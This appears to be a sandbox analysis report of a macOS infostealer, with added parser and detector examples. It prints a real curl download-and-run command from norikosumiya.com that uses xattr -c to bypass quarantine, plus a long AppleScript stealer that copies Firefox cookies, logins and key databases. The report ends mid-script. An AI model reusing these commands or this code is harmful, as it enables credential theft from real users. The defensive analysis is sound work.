  (chain) CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US | C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3 | Mon Dec 18 22:12:39 CET 2023 | Wed Dec 05 01:00:00 CET 2029

Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.11.12 | 49356 | 81.19.135.228 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-19 19:31:51 UTC | 91 | OUT | GET /brew/update HTTP/1.1
Host: norikosumiya.com
User-Agent: curl/7.54.0
Accept: */*
2025-01-19 19:31:51 UTC | 291 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Jan 2025 19:31:53 GMT
Content-Type: application/octet-stream
Content-Length: 234656
Last-Modified: Sun, 19 Jan 2025 19:20:35 GMT
Connection: close
ETag: "678d5083-394a0"
Strict-Transport-Security: max-age=31536000
Accept-Ranges: bytes
2025-01-19 19:31:51 UTC | 16093 | IN | Data Raw: ca fe ba be 00 00 00 02 01 00 00 07 00 00 00 03 00 00 40 00 00 01 55 70 00 00 00 0e 01 00 00 0c 00 00 00 00 00 01 c0 00 00 01 d4 a0 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: @Up
2025-01-19 19:31:51 UTC | 16384 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 33 31 34 33 36 37 35 31 33 39 33 66 34 34 35 31 34 63 37 39 34 35 36 37 32 35 34 32 36 63 32 33 32 35 34 32 36 32 34 38 35 36 36 36 36 32 34 65 36 64 34 32 36 63 35 35 34 63 35 30 34 39 34 34 33 39 33 66 34 39 36 37 32 35 34 31 33 63 37 38 33 31 34 33 34 38 36 38 34 62 35 34 36 66 37 34 34 62 33 66 34 39 36 63 36 64 34 62 33 32 34 30 36 64 34 32 36 32 36 33 33 33 34 32 37 33 36 37 33 39 34 62 33 32 36 37 34 63 37 31 33 32 32 64 34 63 36 34 36 32 37 31 35 36 36 36 36 32 34 32 34 63 36 36 34 36 36 66 33 31 33 66 32 35 35 31 37 34 34 64 35 39 34 64 33 30 37 31 32 35 35 31 37 34 34 64 33 32 32 36 36 64 33 66 37 34 37 31 33 31 34 33 33 36 36 37 35 33 33 66 33 63 36 63 34 63 35 34 37 38 37 34 34 62 35 34 36 66 37 34 35 37 36 36 36 32 36 37 32 35 34 31 34 39 36
Data Ascii: 31436751393f44514c79456725426c23254262485666624e6d426c554c504944393f496725413c78314348684b546f744b3f496c6d4b32406d42626333427367394b32674c71322d4c646271566662424c66466f313f2551744d594d30712551744d32266d3f747131433667533f3c6c4c5478744b546f74576662672541496
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 33 31 34 33 36 64 37 30 33 39 34 33 33 63 37 30 35 36 35 30 33 32 35 30 34 63 34 32 36 63 32 36 33 39 34 32 33 63 32 36 34 63 36 36 33 36 36 66 35 36 37 39 34 39 34 64 33 31 34 32 33 36 34 64 33 31 34 33 36 32 34 65 35 37 34 32 36 64 36 66 35 37 34 32 35 31 34 64 33 30 34 62 35 39 34 64 33 39 34 33 37 34 33 65 33 39 37 39 34 35 32 36 33 31 34 32 33 63 36 65 33 31 36 36 34 30 35 30 33 39 34 32 33 34 33 65 35 37 34 32 36 64 34 30 33 39 34 32 37 33 37 38 35 36 34 33 33 34 32 36 33 31 36 36 36 65 37 39 33 31 36 36 36 64 32 36 33 39 37 39 34 34 34 64 33 30 34 62 35 39 34 64 33 31 36 36 36 33 35 35 33 31 34 32 36 65 32 31 35 36 37 39 33 34 34 30 33 31 37 39 34 36 32 33 34 63 34 33 36 33 34 30 35 37 34 32 34 39 36 33 34 63 34 32 36 65 37 38 33 31 36 36 37 33 36
Data Ascii: 31436d7039433c70565032504c426c2639423c264c66366f5679494d3142364d3143624e57426d6f5742514d304b594d3943743e3979452631423c6e316640503942343e57426d40394273785643342631666e7931666d263979444d304b594d3166635531426e2156793440317946234c436340574249634c426e783166736
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 34 63 36 36 33 31 34 30 34 63 34 32 33 33 35 31 37 34 34 64 35 39 34 64 33 30 36 37 34 36 34 30 35 36 35 30 37 34 36 65 35 37 35 30 36 66 35 35 35 34 33 66 33 32 34 65 34 63 34 32 36 63 32 36 35 36 33 66 33 63 34 30 34 63 36 36 34 38 35 31 33 33 36 34 36 32 34 65 35 37 34 32 34 35 37 31 36 64 34 62 37 37 34 64 34 62 35 30 34 39 36 63 36 64 34 62 33 32 34 65 35 36 33 66 34 39 32 64 36 64 36 36 34 35 37 31 33 31 37 33 34 35 36 63 34 63 35 30 33 63 36 63 35 37 37 39 36 32 36 66 32 35 34 31 33 63 35 35 32 35 34 32 36 64 36 63 36 64 34 31 33 32 36 34 33 31 34 62 36 65 33 34 35 37 36 36 36 32 37 31 34 63 37 39 37 33 36 33 33 31 35 33 34 65 35 31 36 64 36 34 37 34 34 30 36 64 34 32 36 32 36 33 33 39 34 33 33 36 36 66 36 38 35 34 34 30 36 66 33 31 34 33 34 36 36
Data Ascii: 4c6631404c423351744d594d306746405650746e57506f55543f324e4c426c26563f3c404c6648513364624e574245716d4b774d4b50496c6d4b324e563f492d6d6645713173456c4c503c6c5779626f25413c5525426d6c6d413264314b6e34576662714c79736331534e516d6474406d4262633943366f6854406f3143466
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 63 37 31 36 62 35 34 37 38 37 34 35 37 37 39 36 32 36 37 36 64 33 66 37 34 32 33 32 35 34 32 33 31 32 64 36 62 35 31 34 30 36 63 34 63 37 39 35 34 35 31 33 31 37 39 36 63 33 65 33 31 33 66 34 39 34 30 36 62 37 39 36 32 37 31 34 62 37 39 34 35 32 33 32 35 34 32 33 34 32 31 33 31 34 32 36 63 37 31 36 38 34 31 34 39 35 35 34 63 34 33 36 32 37 34 36 64 34 32 36 32 36 33 36 38 35 34 37 38 37 34 36 64 34 31 37 34 33 36 34 62 35 31 36 66 37 34 35 37 36 36 36 32 36 37 32 35 34 32 33 31 34 30 34 63 34 32 36 32 35 34 34 63 36 34 34 39 34 30 36 62 37 33 33 32 36 65 36 64 34 32 35 31 35 31 36 64 34 32 37 37 35 31 35 37 33 66 36 32 35 35 36 64 34 32 36 32 36 66 32 35 34 32 33 31 35 35 35 37 37 39 36 37 35 31 34 63 36 36 35 36 35 31 36 38 37 33 33 32 35 32 33 33 36 37
Data Ascii: c716b547874577962676d3f74232542312d6b51406c4c79545131796c3e313f49406b7962714b7945232542342131426c71684149554c4362746d426263685478746d4174364b516f7457666267254231404c4262544c6449406b73326e6d4251516d427751573f62556d42626f25423155577967514c665651687332523367
2025-01-19 19:31:52 UTC | 16384 | IN | Data Raw: 34 32 31 33 31 36 36 34 30 34 30 33 39 36 36 36 64 32 36 33 39 34 33 36 64 36 65 33 31 34 32 34 35 36 33 33 39 36 34 33 32 37 38 35 36 34 33 34 36 36 65 34 63 37 39 33 36 36 66 35 36 36 36 37 33 34 65 33 39 37 39 33 65 34 64 33 30 34 62 35 39 34 64 35 36 37 39 36 65 37 38 33 39 34 32 34 36 34 64 33 31 33 66 33 32 36 66 33 39 36 36 37 34 36 65 35 37 34 32 37 33 36 66 33 39 37 39 33 63 32 33 34 63 37 39 34 35 37 30 33 39 36 36 37 34 35 30 33 39 34 33 34 35 34 30 34 63 36 36 33 63 34 64 33 39 34 33 34 34 34 64 33 30 34 62 35 39 34 64 33 39 34 32 34 35 34 30 33 31 36 36 36 65 34 30 33 31 36 36 33 34 32 33 33 39 34 32 36 64 32 31 33 39 36 36 33 63 36 65 33 31 34 33 33 36 36 65 33 31 37 39 36 64 32 33 33 31 34 33 33 31 32 31 35 36 36 36 33 34 34 30 35 37 34 32
Data Ascii: 4213166404039666d2639436d6e31424563396432785643466e4c79366f5666734e39793e4d304b594d56796e783942464d313f326f3966746e5742736f39793c234c79457039667450394345404c663c4d3943444d304b594d3942454031666e403166342339426d2139663c6e3143366e31796d2331433121566634405742
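The first 48 bytes of the /brew/update response body are a FAT (universal) Mach-O header, which is what the "Writes FAT Mach-O files to disk" signature in the summary refers to; the "@Up" in the Data Ascii row is only the printable bytes 0x40, 0x55 and 0x70 of the slice offset and size fields, not a string. Two details in the response headers support the same reading: the ETag's size component 0x394a0 equals the Content-Length of 234656, and Last-Modified (19:20:35 GMT) is eleven minutes before the request. The parser below is an added example written for this page, not Joe Sandbox code and not part of the sample: it walks the fat_arch table using the layout from Apple's <mach-o/fat.h> and cross-checks every slice against the Content-Length seen above. The header bytes are copied from the captured Data Raw row; the 30-entry plausibility limit is an assumption used to tell a universal binary from a Java class file, which shares the same magic.

```python
import struct

# First 48 bytes of the /brew/update response body, copied from the captured
# "Data Raw" row of the HTTP session (the rest of that row is zero padding).
RESPONSE_PREFIX = bytes.fromhex(
    "cafebabe" "00000002"                                   # fat_header: magic, nfat_arch
    "01000007" "00000003" "00004000" "00015570" "0000000e"  # fat_arch[0]
    "0100000c" "00000000" "0001c000" "0001d4a0" "0000000e"  # fat_arch[1]
)
CONTENT_LENGTH = 234656  # Content-Length header of the same response

FAT_MAGIC = 0xCAFEBABE       # big-endian on disk, <mach-o/fat.h>
CPU_ARCH_ABI64 = 0x01000000  # <mach/machine.h>
CPU_TYPE_X86 = 7
CPU_TYPE_ARM = 12
CPU_NAMES = {
    CPU_TYPE_X86 | CPU_ARCH_ABI64: "x86_64",
    CPU_TYPE_ARM | CPU_ARCH_ABI64: "arm64",
}
# Assumption: no real universal binary carries this many slices; a Java .class
# file (same magic) has its minor/major version here and fails this check.
MAX_PLAUSIBLE_ARCHES = 30


def parse_fat_header(data: bytes) -> list[dict]:
    """Parse struct fat_header + fat_arch[] from the start of a universal binary."""
    if len(data) < 8:
        raise ValueError("too short for a fat_header")
    magic, nfat_arch = struct.unpack(">II", data[:8])
    if magic != FAT_MAGIC:
        raise ValueError(f"not a FAT Mach-O: magic 0x{magic:08x}")
    if nfat_arch == 0 or nfat_arch > MAX_PLAUSIBLE_ARCHES:
        raise ValueError(f"implausible nfat_arch {nfat_arch} (Java class file?)")
    need = 8 + 20 * nfat_arch
    if len(data) < need:
        raise ValueError(f"need {need} bytes for {nfat_arch} fat_arch entries, have {len(data)}")
    arches = []
    for i in range(nfat_arch):
        off = 8 + 20 * i
        cputype, cpusubtype, offset, size, align = struct.unpack(">IIIII", data[off:off + 20])
        arches.append({
            "arch": CPU_NAMES.get(cputype, f"cputype_0x{cputype:08x}"),
            "cpusubtype": cpusubtype & 0x00FFFFFF,  # strip capability bits
            "offset": offset,
            "size": size,
            "align": 1 << align,                    # stored as log2 in the file
        })
    return arches


def check_slices(arches: list[dict], content_length: int) -> dict:
    """Confirm the slice table is consistent with the bytes actually served."""
    ends = [a["offset"] + a["size"] for a in arches]
    problems = []
    for a, end in zip(arches, ends):
        if a["offset"] % a["align"]:
            problems.append(f'{a["arch"]}: offset {a["offset"]} not aligned to {a["align"]}')
        if end > content_length:
            problems.append(f'{a["arch"]}: slice ends at {end}, past Content-Length {content_length}')
    # slices must not overlap each other or the header table itself
    last_end = 8 + 20 * len(arches)
    for start, end in sorted(zip((a["offset"] for a in arches), ends)):
        if start < last_end:
            problems.append(f"slice at {start} overlaps data ending at {last_end}")
        last_end = end
    return {
        "last_slice_end": max(ends),
        "complete": max(ends) == content_length,  # nothing trailing, nothing truncated
        "problems": problems,
    }


if __name__ == "__main__":
    found = parse_fat_header(RESPONSE_PREFIX)
    for a in found:
        print(f'{a["arch"]:8} subtype={a["cpusubtype"]} offset={a["offset"]:#x} '
              f'size={a["size"]} align={a["align"]}')
    print(check_slices(found, CONTENT_LENGTH))
```

For this capture the table decodes to an x86_64 slice at 0x4000 (87408 bytes) and an arm64 slice at 0x1c000 (119968 bytes); the arm64 slice ends at exactly 234656, so the sandbox received the whole file and the server was not serving a range or a decoy. A mismatch here is worth noting in a report: a truncated download means the later Mach-O analysis ran on a partial binary.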


                                                                      System Behavior

Start time (UTC): 19:31:45
Start date (UTC): 19/01/2025
Path: /usr/libexec/xpcproxy
Arguments: -
File size: 44048 bytes
MD5 hash: 4764d9eafe6b7dac23253a9f8b7f73d6

Start time (UTC): 19:31:45
Start date (UTC): 19/01/2025
Path: /usr/libexec/nsurlstoraged
Arguments: /usr/libexec/nsurlstoraged --privileged
File size: 246624 bytes
MD5 hash: 321b0a40e24b45f0af49ba42742b3f64

Start time (UTC): 19:31:49
Start date (UTC): 19/01/2025
Path: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
Arguments: -
File size: 3722408 bytes
MD5 hash: 8910349f44a940d8d79318367855b236

Start time (UTC): 19:31:49
Start date (UTC): 19/01/2025
Path: /bin/sh
Arguments: /bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
File size: 618480 bytes
MD5 hash: be55e8952a262d0e524239dbf82191ed
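The /bin/sh -c record above is the whole infection chain in one command line: fetch the payload with curl into /tmp, strip every extended attribute with xattr -c (which removes com.apple.quarantine if it is present, so Gatekeeper never assesses the file), mark it executable, and run it. One caveat for anyone writing the detection: curl does not set com.apple.quarantine itself, so the xattr step only matters if the file picked up the attribute some other way; it is still a strong signal, because legitimate install scripts rarely clear xattrs on something they just downloaded. The detector below is an added example written for this page, not Joe Sandbox code and not part of the sample. It parses records in the report's own key:value layout and flags a command line in which all four stages act on the same path in order. The first three records are copied from this report; the fourth is a constructed benign control and did not occur in the sandbox.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Process records in the report's "System Behavior" layout. The first three are
# copied from this report; the last one is a constructed benign control case.
PROCESS_LIST = """\
Start time (UTC):19:31:49
Start date (UTC):19/01/2025
Path:/bin/sh
Arguments:/bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
Start time (UTC):19:31:49
Start date (UTC):19/01/2025
Path:/usr/bin/curl
Arguments:curl -o /tmp/update https://norikosumiya.com/brew/update
File size:185072 bytes
MD5 hash:2418204e23e2952e7995f1819a1f78f5
Start time (UTC):19:31:52
Start date (UTC):19/01/2025
Path:/usr/bin/xattr
Arguments:xattr -c /tmp/update
File size:925 bytes
MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69
Start time (UTC):19:40:00
Start date (UTC):19/01/2025
Path:/bin/sh
Arguments:/bin/sh -c curl -o /tmp/pkg.tar.gz https://example.invalid/pkg.tar.gz && tar -xzf /tmp/pkg.tar.gz -C /tmp
File size:618480 bytes
MD5 hash:be55e8952a262d0e524239dbf82191ed
"""


@dataclass
class ProcessRecord:
    start_time: str
    path: str
    arguments: str
    md5: str


def parse_process_list(text: str) -> list[ProcessRecord]:
    """Split the key:value run into one record per 'Start time (UTC)' line."""
    raw, current = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")   # first colon only; URLs keep theirs
        if not sep:
            continue
        if key == "Start time (UTC)" and current:
            raw.append(current)
            current = {}
        current[key] = value.strip()
    if current:
        raw.append(current)
    return [ProcessRecord(r.get("Start time (UTC)", ""), r.get("Path", ""),
                          r.get("Arguments", ""), r.get("MD5 hash", "")) for r in raw]


# One pattern per stage; each captures the file the stage acts on.
STAGES = {
    "download": re.compile(r"\bcurl\b.*?\s(?:-o|--output)\s+(?P<path>\S+)"),
    # xattr -c clears all attributes; -d com.apple.quarantine removes just that one
    "dequarantine": re.compile(
        r"\bxattr\s+(?:-[a-z]*c[a-z]*|-[a-z]*d[a-z]*\s+com\.apple\.quarantine)\s+(?P<path>\S+)"),
    # symbolic +x or any numeric mode (numeric modes are treated as potential +x)
    "chmod": re.compile(r"\bchmod\s+(?:[ugoa]*\+[rw]*x[rw]*|[0-7]{3,4})\s+(?P<path>\S+)"),
}
ORDER = ("download", "dequarantine", "chmod", "execute")


def split_commands(cmdline: str) -> list[str]:
    """Break a shell one-liner into its simple commands (&&, ||, ;, |)."""
    return [seg.strip() for seg in re.split(r"&&|\|\||;|\|", cmdline) if seg.strip()]


def find_bypass_chain(record: ProcessRecord) -> dict | None:
    """Return the matched chain if one command line downloads a file, strips its
    xattrs, marks it executable and then runs it, all on the same path in that order."""
    segments = split_commands(record.arguments)
    seen: dict[str, dict[str, int]] = {}  # path -> stage -> index of the segment
    for idx, seg in enumerate(segments):
        for stage, rx in STAGES.items():
            if (m := rx.search(seg)) is not None:
                seen.setdefault(m["path"], {}).setdefault(stage, idx)
        head = seg.split()[0]
        if head in seen:                      # the downloaded file itself is the command
            seen[head].setdefault("execute", idx)
    for path, stages in seen.items():
        idxs = [stages.get(s) for s in ORDER]
        if None not in idxs and all(a < b for a, b in zip(idxs, idxs[1:])):
            url = re.search(r"https?://\S+", segments[stages["download"]])
            return {"path": path, "url": url.group(0) if url else None,
                    "stages": {s: segments[stages[s]] for s in ORDER}}
    return None


def scan(text: str) -> list[dict]:
    """Run the chain detector over every record and collect findings."""
    findings = []
    for rec in parse_process_list(text):
        if (hit := find_bypass_chain(rec)) is not None:
            findings.append({"start_time": rec.start_time, "process": rec.path, **hit})
    return findings


if __name__ == "__main__":
    for f in scan(PROCESS_LIST):
        print(f"{f['start_time']} {f['process']}: {f['path']} fetched from {f['url']}")
```

Against the constructed input the detector fires once, on the /bin/sh -c record, and stays quiet on the benign curl-and-untar control and on the single-stage child records. On a real endpoint the four stages usually arrive as separate process events, exactly as they do further down in this report (curl, xattr and chmod each get their own record), so a production rule would correlate by parent process and target path across events rather than regex a single command line.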
Start time (UTC): 19:31:49
Start date (UTC): 19/01/2025
Path: /bin/sh
Arguments: -
File size: 618480 bytes
MD5 hash: be55e8952a262d0e524239dbf82191ed

Start time (UTC): 19:31:49
Start date (UTC): 19/01/2025
Path: /usr/bin/curl
Arguments: curl -o /tmp/update https://norikosumiya.com/brew/update
File size: 185072 bytes
MD5 hash: 2418204e23e2952e7995f1819a1f78f5

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /bin/sh
Arguments: -
File size: 618480 bytes
MD5 hash: be55e8952a262d0e524239dbf82191ed

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /usr/bin/xattr
Arguments: xattr -c /tmp/update
File size: 925 bytes
MD5 hash: e2ca6555fe4b8c6a97d1ced2156c9b69

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Arguments: /usr/bin/python /usr/bin/xattr-2.7 -c /tmp/update
File size: 51744 bytes
MD5 hash: 710c6cc30780eea712240851b44d9eab

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /bin/sh
Arguments: -
File size: 618480 bytes
MD5 hash: be55e8952a262d0e524239dbf82191ed

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /bin/chmod
Arguments: chmod +x /tmp/update
File size: 34144 bytes
MD5 hash: 917cfbf6084318922f8091f050a0bbed

Start time (UTC): 19:31:52
Start date (UTC): 19/01/2025
Path: /bin/sh
Arguments: -
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/tmp/update
                                                                      Arguments:/tmp/update
                                                                      File size:234656 bytes
                                                                      MD5 hash:0418181caaba4686fae772b60d9a2c62
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/pkill
                                                                      Arguments:pkill Terminal
                                                                      File size:30512 bytes
                                                                      MD5 hash:ad01660bd9fdfcf9c67a4879e06d0aa3
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed
                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' 
thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'dumps', 'emoji', 'user_data', '__update__', 'user_data#2', 'user_data#3'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon parseFF(firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'ff/' & currentItemset readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . 
